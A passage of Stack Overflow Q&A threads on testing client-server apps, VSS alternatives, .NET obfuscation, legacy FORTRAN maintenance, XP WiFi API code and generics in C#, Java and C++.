* Do nothing (transparent proxy). Your app should behave normally.
* Spy on / log data traffic. Add a filter mechanism so you don't grab everything.
* Block specific messages. Your filter system is very useful here.
* Corrupt specific messages (this is more difficult).

If you need some sort of network testing:

* Limit general throughput (some libraries do this)
* Delay messages (same remark)
* Change packet order (quite difficult)

A: Have you considered using a UI functional testing tool? You could check out HP's QuickTest Professional, which covers a wide variety of UI technologies.

A: We are developing a client-server based application using EJB (J2EE) technology, Eclipse and MySQL (database). Please suggest an open source testing tool for functional testing. Thanks, Hitesh Shah

A: Separate your client-server communication into a pure logic module (or package). Test this separately - either have a test server, or use mock objects. Then, have your UI actions invoke the communications layer. Also, have a look at the command design pattern; using it may help you.
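For illustration, a minimal sketch of the Observer/Observable separation the first answer recommends (hypothetical model class; java.util.Observable was the idiomatic choice in RCP-era Java, though it has since been deprecated):

    import java.util.Observable;
    import java.util.Observer;

    // Pure-logic model: no GUI code, so it can be unit-tested directly.
    class ConnectionModel extends Observable {
        private String status = "disconnected";

        public void setStatus(String status) {
            this.status = status;
            setChanged();
            notifyObservers(status);  // views react; tests can assert on getStatus()
        }

        public String getStatus() { return status; }
    }

    public class ObserverDemo {
        public static void main(String[] args) {
            ConnectionModel model = new ConnectionModel();
            // In the real app this observer would be a GUI view.
            Observer view = (obs, arg) -> System.out.println("View saw: " + arg);
            model.addObserver(view);
            model.setStatus("connected");
        }
    }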
{ "language": "en", "url": "https://stackoverflow.com/questions/31598", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Alternative to VSS for a one man show (army of one?). I've been programming for 10+ years now for the same employer, and the only source code control we've ever used is VSS. (Sorry - that's what they had when I started.) There's only ever been a few of us; two right now, and we usually work alone, so VSS has worked OK for us. So, I have two questions:

1) Should we switch to something else, like Subversion, Git, TFS, etc. - what exactly, and why (please)?
2) Am I beyond all hope and destined to eternal damnation because VSS has corrupted me (as Jeff says)?

Wow - thanks for all the great responses! It sounds like I should clarify a few things. We are an MS shop (Gold partner) and we mostly do VB, ASP.NET, SQL Server, SharePoint & BizTalk work. I have a CS degree, so I've done x86 assembly, C, and C++ on DEC Unix and Slackware Linux in a "time out of mind"... My concern with VSS is that now I'm working over a VPN a lot more, and VSS's performance sucks, and I'm afraid that our 10+ year old, version 5 VSS database is going to get hosed... There's the LAN service that's supposed to speed things up, but I've never used it and I'm not sure it helps with corruption - has anyone used the VSS LAN service? (New with VSS 2005.)

A: If you're used to the way VSS works, check out (no pun intended) SourceGear's Vault. It's an excellent way to migrate away from VSS, as it comes with IDE integration and supports check out / check in, but when you're ready and feel comfortable you can also move to the edit-update-commit style of programming found in SVN. It's free for single developers, runs on IIS, and is built on .NET, so it should be a fairly familiar stack for you to switch to.

A: Whatever you do, don't change for the sake of changing. If it's working for you and you're not having problems with it, I don't see any reason to switch.

A: For what it's worth, Perforce is a potential option if you truly stick to 1 or 2 users. The current Perforce docs say you can have 2 users and 5 clients without having to start purchasing licenses. You might have reasons to switch to Perforce depending on your workflow and whether you have need of branching the way Perforce does it. Not being overly familiar with some of the other products mentioned here, I can't tell you how Perforce compares in the feature department for things like branching, etc. It is speedy, and it's been rock solid for us (300+ developers on a 10+ year old codebase). We store several T of info and it's been quite responsive. With a small number of users, I doubt that you'd experience many performance troubles, assuming you had good hardware for your server. Having used VSS before, I believe that you can get so many benefits out of a better SCM system that switching should be considered regardless of whether you have corruption or not. Branching alone might be worth it for you. A true client/server model and better interfaces (programmatic and command line) are a couple of other things that could really help improve your workflow and help somewhat with productivity. In summary, my view of Perforce is:

* It's fast and quite reliable
* Plenty of cross-platform client tools (Windows, Unix, Mac, etc.)
* It's free for 2 users and 5 clients
* It integrates into Developer Studio (and other tools)
* It has a powerful branching system (that might or might not be right for you)
* It has several scriptable interfaces (Python, Perl, Ruby, C++)

Certainly YMMV -- I only offer this alternative up as something that might be worthwhile looking into.

A: I've recently started using Mercurial for some of my work. It's a distributed system like Git, but it seems easier to use and seems far better supported on Windows, the latter of which was crucial for me. With distributed source code control, every user has a complete local copy of the repository. If you're the only person working on a project, as you say you often are, this can simplify things a lot, since you just create your own repository and do all your commits etc. locally. If you want to bring on other developers later, you can just push the full contents of your repository - current versions and all history - to another system, either on a shared server or directly onto another user's workstation. If you're working only with a local repository, remember you'll also need a backup solution, as there isn't a copy of all your code on a shared server. I think that Mercurial has lots of other advantages over Subversion, but it does have a big downside, which has already been mentioned as a plus point of Subversion: there are lots of third-party tools and integrations for Subversion. As Mercurial hasn't been around nearly as long, the choice is much smaller. On Windows it seems that you either have to use the command line (my choice) or the TortoiseHg Windows Explorer integration.

A: VSS is horrible. I may be channelling Spolsky (not sure if he's said this), but using VSS is actually worse than not using source control at all. Despite its name, it isn't safe. It creates the illusion of safety without providing it. Without VSS, you'd probably be making regular backups of your code. With VSS, you'll think, "Meh, it's already under source control. Why bother backing up?" Great, until it corrupts your entire codebase and you lose everything. (This, incidentally, happened at a company I worked at.) Get rid of VSS as soon as you can and switch to a real source control solution.

A: Don't worry about VSS corrupting you; worry about VSS corrupting your data. It does not have a good track record in that department. Back up frequently if you do not switch to a different version control system. Backups should be happening daily even with other SCMs, but it's doubly important with VSS.

A: I like using Subversion for my personal projects. I could go down the list of features and pretend it brings a lot to the table that other source control systems don't, but there are tons of good ones out there, and the right choice is really a matter of style. If you check in after each small change (i.e. one check-in per function change), then many people can work on the same source file with very low risk of merge conflicts in practically anything but VSS (I haven't used VSS in years, but from what I remember only one person at a time can work on a file). If this isn't ever going to happen to you, I feel the best course of action is to use what you know. VSS is better than no source control at all, but it feels restrictive to me these days. I don't think you're beyond hope because you're asking if it would be better to switch; you're beyond hope when the answer is obvious and you ignore the evidence. Even if you don't change source control systems, you ought to pick one like SVN or Git and spend a few weeks reading about it and making a small project using it; it always helps to sharpen the saw.

A: I'd probably go with Subversion, if I were you. I'm a total Git fanatic at this point, but Subversion certainly has some advantages:

* simplicity
* abundance of interoperable tools
* an active and supportive community
* portability
* really nice Windows shell integration
* integration with Visual Studio (I think - but surely through a third party)

Git has many, many other advantages, but the above tend to be the ones people care about when asking general questions like the above.

Edit: The company I now work for is using VisualSVN Server, which is free. It makes setting up a Subversion repository on a Windows server stupidly simple, and on the client we're using TortoiseSVN (for shell integration) and AnkhSVN for Visual Studio support. It's quite good, and should be fairly easy for even VSS users to pick up.

Latter-day edit: So... nearly eight years later, I would never recommend Subversion to anyone for any reason. I don't really recant, per se, because I think my advice was valid at the time. However, in 2016, Subversion retains almost none of the advantages it used to have over Git. The tooling for Git is superior to (and much more diverse than) what it once was, and in particular, there's GitHub and other good Git hosting providers (BitBucket, Beanstalk, Visual Studio Online, just off the top of my head). Visual Studio now has Git support out of the box, and it's actually pretty good. There are even PowerShell modules to give a more native Windows experience to denizens of the console. Git is even easier to set up and use than Subversion and doesn't require a server component. Git has become as ubiquitous as any single tool can be, and you really would only be cheating yourself not to use it (unless you just really want to use something not-Git). Don't misunderstand - this isn't me hating on Subversion, but rather me recognizing that it's a tool from another time, rather like a straight razor for shaving.

A: I don't agree with the people who say that if you don't have problems you'd better not switch. I think that SCM is one of the disciplines a good developer should know well, and frankly, even if you master VSS, you are experiencing only a small fraction of the advantages a good SCM tool and SCM strategy can bring to you and your team. Obviously, evaluate and test the alternatives first in a non-production environment.

A: At work we use Subversion with TortoiseSVN - it works very nicely, but it is philosophically different from VSS (not really a problem if it's just you, but worth being aware of). I really like the fact that the whole repository has a revision number. Given a free choice I'd probably have gone with Vault, but at the time I had zero budget. I'm looking at things for personal use. There are reasons to use Subversion and reasons to use something completely different. The alternatives I'm considering are Vault (as before, free for single use) and Bazaar. Git I've had to dismiss, as I am, unashamedly, a Windows person, and right now Git just isn't. The distributed nature of Git and the option of private/temporary check-ins (assuming I've understood what I've read) is attractive - hence my looking at Bazaar.

Update: I did some more digging and playing, and I actually went with Mercurial for personal use. The integrated install with TortoiseHg makes things very simple, and it seems to be well regarded. I'm still trying to work out how to force an automagic mirror of commits to a server, and there appear to be some minor limitations to the ignore function, but it's doing the job nicely so far... Murph

A: Looks like Subversion is the winner here. I'd do yourself a favor and use VisualSVN Server. It's free and will save you a bunch of installation headaches.

A: I'd say stick with what works for you. Unless you are having issues with VSS, why switch? Subversion is swell, though a little sticky to begin using. TFS is far better than VSS, though it is fairly expensive for such a small team. I have not used Git, so I can't really speak to it.

A: I used VSS for years until switching to SVN about two years ago. My biggest complaints about VSS were the poor network performance (that problem may be solved now) and the pessimistic locking of files. SVN solved both of those, is easy to set up (I use CollabNet server and TortoiseSVN client, although there are two good Visual Studio plugins: VisualSVN - commercial, and AnkhSVN - open source), easy to use and administer, and well documented. It's tempting to say "if it's not broken then don't fix it", but you would get to learn a more modern source control tool and, perhaps more importantly, new ways of using source control (e.g. more frequent branching and merging) that the new tool would support.

A: If you only have 2 people, and you mostly work independently, Git is going to give you a lot more flexibility and power, and be far and away the fastest to work with. It is, however, a pain in the backside to use. Using VSS you're obviously programming for Windows - if you're doing Win32 API stuff in C then Git will be a learning curve but will be quite interesting. If the depths of your knowledge, however, only extend to ASP and Visual Basic, just use Subversion. Walk before you can run. ** I'm not trying to say that if you only know VB you're dumb or anything like that, but Git can be very finicky and picky to use (if you've used the WinAPI in C you know all about picky and finicky), and you may want a more gradual introduction to SCM than Git provides.

A: If you are a one man show and strictly a Microsoft shop, then SourceGear Vault is definitely a prime candidate for switching to. Features:

* Free for single user, great for you
* It uses SQL Server for its backend, therefore data reliability is huge
* It has atomic check-ins; all files checked in at the same time are arranged in a group and are called a changeset
* Visual Studio integration
* Has a tool for importing from SourceSafe, therefore you can keep your history
* The client communicates with the server over HTTP, so accessing the source remotely outside the office can be set up very easily and performs well, because they only transfer the deltas of the changes being submitted and received; you can use SSL to secure the connection

I would definitely consider this as an option.

A: If you want a full life cycle in one package, then you probably want to look at Visual Studio Team System. It does require a server, but you can get an "Action Pack" from MS that includes all the licenses that you need for "Team Foundation Server Workgroup Edition" from the Partner centre. With this you will get bug, risk and issue tracking as well as many other features :)

* Source Control
* Work Item Tracking (requirements, bugs, issues, risks and tasks)
* Reporting on your project data (work item tracking, build, check-ins and more in one cube)
* Code Analysis
* Unit Testing
* Load Testing
* Performance Analysis
* Automated Build
{ "language": "en", "url": "https://stackoverflow.com/questions/31627", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "12" }
Q: Remove Meta Data from .NET applications? Is this possible? Does the .NET framework depend on the metadata in the bytecode? I'd like to have an application I write not work in Reflector or a similar .NET decompiler.

A: If you remove the metadata, the framework won't be able to load your code, or figure out which other assemblies it references, or anything like that, so no, that's not a good idea. Obfuscators will make it a lot harder for an 'attacker' to decompile your code, but at the end of the day, if someone is motivated and smart, there's not a lot you can do to stop them. .NET will always compile down to MSIL, and MSIL is inherently easier to read than raw x86. That's just one of the tradeoffs you make for using .NET. Don't worry about it. The source code to Apache, Linux, and everything else is freely available on the net, but it's not providing much competitive advantage to Microsoft, is it :-)

A: I think you are referring to the assembly manifest: "Every assembly, whether static or dynamic, contains a collection of data that describes how the elements in the assembly relate to each other. The assembly manifest contains this assembly metadata. An assembly manifest contains all the metadata needed to specify the assembly's version requirements and security identity, and all metadata needed to define the scope of the assembly and resolve references to resources and classes." One of the most important features of .NET assemblies is that they are self-describing components, and this is provided by the manifest. So removing it would somewhat defeat the purpose.

A: This looks like the same question as: How do I make the manifest of a .NET assembly private? See my answer there: "I think what you're talking about is 'obfuscation'. There are lots of articles about it on the net: http://en.wikipedia.org/wiki/Obfuscation The 'standard' tool for obfuscation on .NET is by Preemptive Solutions: http://www.preemptive.com/obfuscator.html They have a community edition that ships with Visual Studio which you can use. You mentioned ILDasm; have you looked at the .NET Reflector? http://aisto.com/roeder/dotnet/ It gives you an even better idea as to what people can see if you release a manifest!"

A: I don't think you can remove the metadata, but you can obfuscate your code if you're looking to protect your IP.

A: The Dotfuscator will stop your code from being able to be decompiled: http://www.preemptive.com/dotfuscator.html Edit: I should have mentioned, that's the professional version; the free community version ships with Visual Studio.

A: Wouldn't solutions like VMware's ThinApp (formerly Thinstall) help a bit with protecting your code also? It comes at an extremely high price, though..
{ "language": "en", "url": "https://stackoverflow.com/questions/31637", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Learning FORTRAN in the modern era. I've recently come to maintain a large amount of scientific calculation-intensive FORTRAN code. I'm having difficulty getting a handle on all of the, say, nuances of a forty-year-old language, despite Google and two introductory-level books. The code is rife with "performance-enhancing improvements". Does anyone have any guides or practical advice for de-optimizing FORTRAN into CS 101 levels? Does anyone have knowledge of how FORTRAN code optimization operated? Are there any typical FORTRAN 'gotchas' that might not occur to a Java/C++/.NET-raised developer taking over a FORTRAN 77/90 codebase?

A: You kind of have to get a "feel" for what programmers had to do back in the day. The vast majority of the code I work with is older than I am and ran on machines that were "new" when my parents were in high school. Common FORTRAN-isms I deal with that hurt readability are:

* Common blocks
* Implicit variables
* Two or three DO loops with shared CONTINUE statements
* GOTOs in place of DO loops
* Arithmetic IF statements
* Computed GOTOs
* Equivalence of REAL/INTEGER/other in some common block

Strategies for solving these involve:

* Get Spag / plusFORT; it's worth the money, it solves a lot of them automatically and Bug Free(tm)
* Move to Fortran 90 if at all possible; if not, move to free-format Fortran 77
* Add IMPLICIT NONE to each subroutine and then fix every compile error - time consuming but ultimately necessary; some programs can do this for you automatically (or you can script it)
* Move all COMMON blocks to MODULEs - low-hanging fruit, worth it
* Convert arithmetic IF statements to IF..ELSEIF..ELSE blocks
* Convert computed GOTOs to SELECT CASE blocks
* Convert all DO loops to the newer F90 syntax:

    myloop: do ii = 1, nloops
        ! do something
    enddo myloop

* Convert equivalenced common block members to either ALLOCATABLE memory allocated in a module, or to their true character routines if it is Hollerith being stored in a REAL

If you have more specific questions as to how to accomplish some readability tasks, I can give advice. I have a code base of a few hundred thousand lines of Fortran, written over the span of 40 years, that I am in some way responsible for, so I've probably run across any "problems" you may have found.

A: As someone with experience in both FORTRAN (the 77 flavor, although it has been a while since I used it seriously) and C/C++, the item to watch out for that immediately jumps to mind is arrays. FORTRAN arrays start with an index of 1 instead of 0 as they do in C/C++/Java. Also, the memory arrangement is reversed, so incrementing the first index gives you sequential memory locations. My wife still uses FORTRAN regularly and has some C++ code she needs to work with now, and I'm about to start helping her with it. As issues come up during her conversion I'll try to point them out. Maybe they will help.

A: I have used Fortran starting with the '66 version since 1967 (on an IBM 7090 with 32k words of memory). I then used PL/1 for some time, but later went back to Fortran 95 because it is ideally suited for the matrix/complex-number problems we have. I would like to add to the considerations that much of the convoluted structure of old codes is simply due to the small amount of memory available, forcing things like reusing a few lines of code via computed or assigned GOTOs. Another problem is optimization by defining auxiliary variables for every repeated subexpression - compilers simply did not optimize for that. In addition, it was not allowed to write DO i=1,n+1; you had to write n1=n+1; DO i=1,n1. As a consequence, old codes are overwhelmed with superfluous variables. When I rewrote a code in Fortran 95, only 10% of the variables survived. If you want to make the code more legible, I highly recommend looking for variables that can easily be eliminated. Another thing I might mention is that for many years complex arithmetic and multidimensional arrays were highly inefficient. That is why you often find code rewritten to do complex calculations using only real variables, and matrices addressed with a single linear index.

A: Well, in one sense, you're lucky, 'cause Fortran doesn't have much in the way of subtle flow-of-control constructs or inheritance or the like. On the other hand, it's got some truly amazing gotchas, like the arithmetically-calculated branch-to-numeric-label stuff, the implicitly-typed variables which don't require declaration, and the lack of true keywords. I don't know about the "performance enhancing improvements". I'd guess most of them are probably ineffective, as a couple of decades of compiler technology have made most hinting unnecessary. Unfortunately, you'll probably have to leave things the way they are, unless you're planning a massive rewrite. Anyway, the core scientific calculation code should be fairly readable. Any programming language using infix arithmetic would be good preparation for reading Fortran's arithmetic and assignment code.

A: Could you explain what you have to do in maintaining the code? Do you really have to modify the code? If you can get away with modifying just the interface to that code instead of the code itself, that would be best. The inherent problem when dealing with a large scientific code (not just FORTRAN) is that the underlying mathematics and the implementation are both complex. Almost by default, the implementation has to include code optimization in order to run within a reasonable time frame. This is compounded by the fact that a lot of code in this field is created by scientists/engineers who are experts in their field, but not in software development. Let's just say that "easy to understand" is not their first priority (I was one of them, and am still learning to be a better software developer). Due to the nature of the problem, I don't think a general question and answer is enough to be helpful. I suggest you post a series of specific questions with code snippets attached. Perhaps starting with the one that gives you the most headaches?

A: I loved FORTRAN; I used to teach and code in it. Just wanted to throw that in. Haven't touched it in years. I started out in COBOL; when I moved to FORTRAN I felt I was freed. Everything is relative, yeah? I'd second what has been said above - recognise that this is a PROCEDURAL language - no subtleties - so take it as you see it. It will probably frustrate you to start with.

A: Legacy Fortran Soapbox

I helped maintain/improve a legacy Fortran code base for quite a while and for the most part think sixlettervariables is on the money. That advice, though, tends to the technical; a tougher row to hoe is implementing "good practices":

* Establish a required coding style and coding guidelines.
* Require a code review (of more than just the coder!) for anything submitted to the code base. (Version control should be tied to this process.)
* Start building and running unit tests; ditto benchmark or regression tests.

These might sound like obvious things these days, but at the risk of over-generalizing, I claim that most Fortran code shops have an entrenched culture, some started before the term "software engineering" even existed, and that over time what comes to dominate is "get it done now". (This is not unique to Fortran shops by any means.)

Embracing Gotchas

But what to do with an already existing, grotty old legacy code base? I agree with Joel Spolsky on rewriting: don't. However, in my opinion sixlettervariables does point to the allowable exception: use software tools to transition to better Fortran constructs. A lot can be caught/corrected by code analyzers (FORCHECK) and code rewriters (plusFORT). If you have to do it by hand, make sure you have a pressing reason. (I wish I had on hand a reference to the number of software bugs that came from fixing software bugs; it is humbling. I think some such statistic is in Expert C Programming.)

Probably the best offense in winning the game of Fortran gotchas is having the best defense: knowing the language fairly well. To further that end, I recommend... books!

Fortran Dead Tree Library

I have had only modest success as a "QA nag" over the years, but I have found that education does work, sometimes inadvertently, and that one of the most influential things is a reference book that someone has on hand. I love and highly recommend

Fortran 90/95 for Scientists and Engineers, by Stephen J. Chapman

The book is even good with Fortran 77 in that it specifically identifies the constructs that shouldn't be used and gives the better alternatives. However, it is actually a textbook and can run out of steam when you really want to know the nitty-gritty of Fortran 95, which is why I recommend

Fortran 90/95 Explained, by Michael Metcalf & John K. Reid

as your go-to reference (sic) for Fortran 95. Be warned that it is not the most lucid writing, but the veil will lift when you really want to get the most out of a new Fortran 95 feature.

For focusing on the issues of going from Fortran 77 to Fortran 90, I enjoyed

Migrating to Fortran 90, by Jim Kerrigan

but the book is now out of print. (I just don't understand O'Reilly's use of Safari; why isn't every one of their out-of-print books available?)

Lastly, as to the heir to the wonderful, wonderful classic Software Tools, I nominate

Classical FORTRAN, by Michael Kupferschmid

This book not only shows what one can do with "only" Fortran 77, but it also talks about some of the more subtle issues that arise (e.g., whether or not one should use the EXTERNAL declaration). This book doesn't exactly cover the same space as Software Tools, but they are two of the three Fortran programming books that I would tag as "fun"... (here's the third).

Miscellaneous advice that applies to almost every Fortran compiler:

* There is a compiler option to enforce IMPLICIT NONE behavior, which you can use to identify problem routines without modifying them with the IMPLICIT NONE declaration first. This piece of advice won't seem meaningful until after the first time a build bombs because of an IMPLICIT NONE command inserted into a legacy routine. (What? Your code review didn't catch this? ;-)
* There is a compiler option for array bounds checking, which can be useful when debugging Fortran 77 code.
* Fortran 90 compilers should be able to compile almost all Fortran 77 code and even older Fortran code. Turn on the reporting options on your Fortran 90 compiler, run your legacy code through it, and you will have a decent start on syntax checking.
Some commercial Fortran 77 compilers are actually Fortran 90 compilers that are running in Fortran 77 mode, so this might be relatively trivial option twiddling for whatever build scripts you have. A: I started on Fortran IV (WATFIV) on punch cards, and my early working years were VS FORTRAN v1 (IBM, Fortran 77 level). Lots of good advice in this thread. I would add that you have to distinguish between things done to get the beast to run at all, versus things that "optimize" the code, versus things that are more readable and maintainable. I can remember dealing with VAX overlays in trying to get DOE simulation code to run on IBM with virtual memory (they had to be removed and the whole thing turned into one address space). I would certainly start by carefully restructuring FORTRAN IV control structures to at least FORTRAN 77 level, with proper indentation and commenting. Try to get rid of primitive control structures like ASSIGN and COMPUTED GOTO and arithmetic IF, and of course, as many GOTOs as you can (using IF-THEN-ELSE-ENDIF). Definitely use IMPLICIT NONE in every routine, to force you to properly declare all variables (you wouldn't believe how many bugs I caught in other people's code -- typos in variable names). Watch out for "premature optimizations" that you're better off letting the compiler handle by itself. If this code is to continue to live and be maintainable, you owe it to yourself and your successors to make it readable and understandable. Just be certain of what you are doing as you change the code! FORTRAN has lots of peculiar constructs that can easily trip up someone coming from the C side of the programming world. Remember than FORTRAN dates back to the mid-late '50s, when there was no such thing as a science of language and compiler design, just ad hoc hacking together of something (sorry, Dr. B!). A: There's something in the original question that I would caution about. You say the code is rife with "performance enhancing improvements". Since Fortran problems are generally of a scientific and mathematical nature, do not assume these performance tricks are there to improve the compilation. It's probably not about the language. In Fortran, the solution is seldom about efficiency of the code itself but of the underlying mathematics to solve the end problem. The tricks may make the compilation slower, may even make the logic appear messy, but the intent is to make the solution faster. Unless you know exactly what it is doing and why, leave it alone. Even simple refactoring, like changing dumb looking variable names can be a big pitfall. Historically standard mathematical equations in a given field of science will have used a particular shorthand since the days of Maxwell. So to see an array named B(:) in electromagnetics tells all Emag engineers exactly what is being solved for. Change that at your peril. Moral, get to know the standard nomenclature of the science before renaming too. A: Here's another one that has bit me from time to time. When you are working on FORTRAN code make sure you skip all six initial columns. Every once and a while, I'll only get the code indented five spaces and nothing works. At first glance everything seems okay and then I finally realize that all the lines are starting in column 6 instead of column 7. 
For anyone not familiar with FORTRAN, the first 5 columns are for statement labels (line numbers), the 6th column is for a continuation character in case a statement doesn't fit within columns 7 through 72 (just put any non-blank character here and the compiler knows that this line is actually part of the one before it), and code always starts in column 7. Columns 73 through 80 were traditionally reserved for card sequence numbers and are ignored by the compiler.
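To make the column rules concrete, here is a small, hypothetical fixed-form snippet: the comment marker in column 1, the label 10 within columns 1-5, the & continuation marker in column 6, and every statement starting in column 7.

C     'C' in column 1 marks a comment line.
      PROGRAM COLS
      IMPLICIT NONE
      INTEGER I, TOTAL
      TOTAL = 0
      DO 10 I = 1, 10
         TOTAL = TOTAL +
     &           I
   10 CONTINUE
      PRINT *, 'TOTAL = ', TOTAL
      END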
{ "language": "en", "url": "https://stackoverflow.com/questions/31672", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "80" }
Q: Wifi Management on XP (SP2/SP3) Wifi support on Vista is fine, but Native Wifi on XP is half baked. NDIS 802.11 Wireless LAN Miniport Drivers only gets you part of the way there (e.g. network scanning). From what I've read (and tried), the 802.11 NDIS drivers on XP will not allow you to configure a wireless connection. You have to use the Native Wifi API in order to do this. (Please, correct me if I'm wrong here.) Applications like InSSIDer have helped me to understand the APIs, but InSSIDer is just a scanner and is not designed to configure Wifi networks. So, the question is: where can I find some code examples (C# or C++) that deal with the configuration of Wifi networks on XP -- e.g. profile creation and connection management? I should note that this is a XP Embedded application on a closed system where we can't use the built-in Wireless Zero Configuration (WZC). We have to build all Wifi management functionality into our .NET application. Yes, I've Googled myself blue. It seems that someone should have a solution to this problem, but I can't find it. That's why I'm asking here. Thanks. A: We use WZC on XP and Native WiFi on Vista, but here's the code which we use on Vista, FWIW. Profile creation:

// open a handle to the service
if ((dwError = WlanOpenHandle(
        WLAN_API_VERSION,
        NULL,              // reserved
        &dwServiceVersion,
        &hClient)) != ERROR_SUCCESS)
{
    hClient = NULL;
}
return dwError;

dwError = WlanSetProfile(hClient, &guid, 0, profile, NULL, TRUE, NULL, &reason_code);

Make a connection:

WLAN_CONNECTION_PARAMETERS conn;
conn.wlanConnectionMode = wlan_connection_mode_profile;
conn.strProfile = name;
conn.pDot11Ssid = NULL;
conn.pDesiredBssidList = NULL;
conn.dot11BssType = dot11_BSS_type_independent;
conn.dwFlags = NULL;

dwError = WlanConnect(hClient, &guid, &conn, NULL);

Check for connection:

BOOL ret = FALSE;
DWORD dwError;
DWORD size;
void *p = NULL;
WLAN_INTERFACE_STATE *ps;

dwError = WlanQueryInterface(hClient, &guid,
    wlan_intf_opcode_interface_state, NULL, &size, &p, NULL);
ps = (WLAN_INTERFACE_STATE *)p;
if (dwError != 0)
    ret = FALSE;
else if (*ps == wlan_interface_state_connected)
    ret = TRUE;
if (p != NULL)
    WlanFreeMemory(p);
return ret;

To keep connected to the network, just spawn a thread then keep checking for a connection, then re-connecting if need be. EDIT: Man this markup stuff is lame. Takes me like 3 edits to get the farking thing right. A: Thanks for the feedback Nick. I've pretty much gotten the profile and connection management working. The trick is figuring out which parts of the Native Wifi API are not supported on XP. Fortunately, the Managed Wifi API has connect/disconnect notification events that do work on XP (NetworkChange also gives similar change events).
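For the XP side, the Managed Wifi API wrapper mentioned above is probably the least painful route from .NET. A hedged sketch, going from memory of that library's sample code (treat the type and method names as assumptions to verify against the actual assembly):

using NativeWifi;

public static void ConnectToProfile(string profileXml, string profileName)
{
    WlanClient client = new WlanClient();
    foreach (WlanClient.WlanInterface wlanIface in client.Interfaces)
    {
        // Push the profile XML to the adapter, then connect by profile name.
        wlanIface.SetProfile(Wlan.WlanProfileFlags.AllUser, profileXml, true);
        wlanIface.Connect(Wlan.WlanConnectionMode.Profile,
                          Wlan.Dot11BssType.Any, profileName);
    }
}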
{ "language": "en", "url": "https://stackoverflow.com/questions/31673", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "-1" }
Q: What are the differences between Generics in C# and Java... and Templates in C++? I mostly use Java and generics are relatively new. I keep reading that Java made the wrong decision or that .NET has better implementations etc. etc. So, what are the main differences between C++, C#, Java in generics? Pros/cons of each? A: C++ rarely uses the “generics” terminology. Instead, the word “templates” is used and is more accurate. Templates describes one technique to achieve a generic design. C++ templates is very different from what both C# and Java implement for two main reasons. The first reason is that C++ templates don't only allow compile-time type arguments but also compile-time const-value arguments: templates can be given as integers or even function signatures. This means that you can do some quite funky stuff at compile time, e.g. calculations: template <unsigned int N> struct product { static unsigned int const VALUE = N * product<N - 1>::VALUE; }; template <> struct product<1> { static unsigned int const VALUE = 1; }; // Usage: unsigned int const p5 = product<5>::VALUE; This code also uses the other distinguished feature of C++ templates, namely template specialization. The code defines one class template, product that has one value argument. It also defines a specialization for that template that is used whenever the argument evaluates to 1. This allows me to define a recursion over template definitions. I believe that this was first discovered by Andrei Alexandrescu. Template specialization is important for C++ because it allows for structural differences in data structures. Templates as a whole is a means of unifying an interface across types. However, although this is desirable, all types cannot be treated equally inside the implementation. C++ templates takes this into account. This is very much the same difference that OOP makes between interface and implementation with the overriding of virtual methods. C++ templates are essential for its algorithmic programming paradigm. For example, almost all algorithms for containers are defined as functions that accept the container type as a template type and treat them uniformly. Actually, that's not quite right: C++ doesn't work on containers but rather on ranges that are defined by two iterators, pointing to the beginning and behind the end of the container. Thus, the whole content is circumscribed by the iterators: begin <= elements < end. Using iterators instead of containers is useful because it allows to operate on parts of a container instead of on the whole. Another distinguishing feature of C++ is the possibility of partial specialization for class templates. This is somewhat related to pattern matching on arguments in Haskell and other functional languages. For example, let's consider a class that stores elements: template <typename T> class Store { … }; // (1) This works for any element type. But let's say that we can store pointers more effciently than other types by applying some special trick. We can do this by partially specializing for all pointer types: template <typename T> class Store<T*> { … }; // (2) Now, whenever we instance a container template for one type, the appropriate definition is used: Store<int> x; // Uses (1) Store<int*> y; // Uses (2) Store<string**> z; // Uses (2), with T = string*. A: Both Java and C# introduced generics after their first language release. However, there are differences in how the core libraries changed when generics was introduced. 
C#'s generics are not just compiler magic and so it was not possible to generify existing library classes without breaking backwards compatibility. For example, in Java the existing Collections Framework was completely genericised. Java does not have both a generic and legacy non-generic version of the collections classes. In some ways this is much cleaner - if you need to use a collection in C# there is really very little reason to go with the non-generic version, but those legacy classes remain in place, cluttering up the landscape. Another notable difference is the Enum classes in Java and C#. Java's Enum has this somewhat tortuous looking definition: // java.lang.Enum Definition in Java public abstract class Enum<E extends Enum<E>> implements Comparable<E>, Serializable { (see Angelika Langer's very clear explanation of exactly why this is so. Essentially, this means Java can give type safe access from a string to its Enum value: // Parsing String to Enum in Java Colour colour = Colour.valueOf("RED"); Compare this to C#'s version: // Parsing String to Enum in C# Colour colour = (Colour)Enum.Parse(typeof(Colour), "RED"); As Enum already existed in C# before generics was introduced to the language, the definition could not change without breaking existing code. So, like collections, it remains in the core libraries in this legacy state. A: 11 months late, but I think this question is ready for some Java Wildcard stuff. This is a syntactical feature of Java. Suppose you have a method: public <T> void Foo(Collection<T> thing) And suppose you don't need to refer to the type T in the method body. You're declaring a name T and then only using it once, so why should you have to think of a name for it? Instead, you can write: public void Foo(Collection<?> thing) The question-mark asks the the compiler to pretend that you declared a normal named type parameter that only needs to appear once in that spot. There's nothing you can do with wildcards that you can't also do with a named type parameter (which is how these things are always done in C++ and C#). A: I'll add my voice to the noise and take a stab at making things clear: C# Generics allow you to declare something like this. List<Person> foo = new List<Person>(); and then the compiler will prevent you from putting things that aren't Person into the list. Behind the scenes the C# compiler is just putting List<Person> into the .NET dll file, but at runtime the JIT compiler goes and builds a new set of code, as if you had written a special list class just for containing people - something like ListOfPerson. The benefit of this is that it makes it really fast. There's no casting or any other stuff, and because the dll contains the information that this is a List of Person, other code that looks at it later on using reflection can tell that it contains Person objects (so you get intellisense and so on). The downside of this is that old C# 1.0 and 1.1 code (before they added generics) doesn't understand these new List<something>, so you have to manually convert things back to plain old List to interoperate with them. This is not that big of a problem, because C# 2.0 binary code is not backwards compatible. The only time this will ever happen is if you're upgrading some old C# 1.0/1.1 code to C# 2.0 Java Generics allow you to declare something like this. ArrayList<Person> foo = new ArrayList<Person>(); On the surface it looks the same, and it sort-of is. The compiler will also prevent you from putting things that aren't Person into the list. 
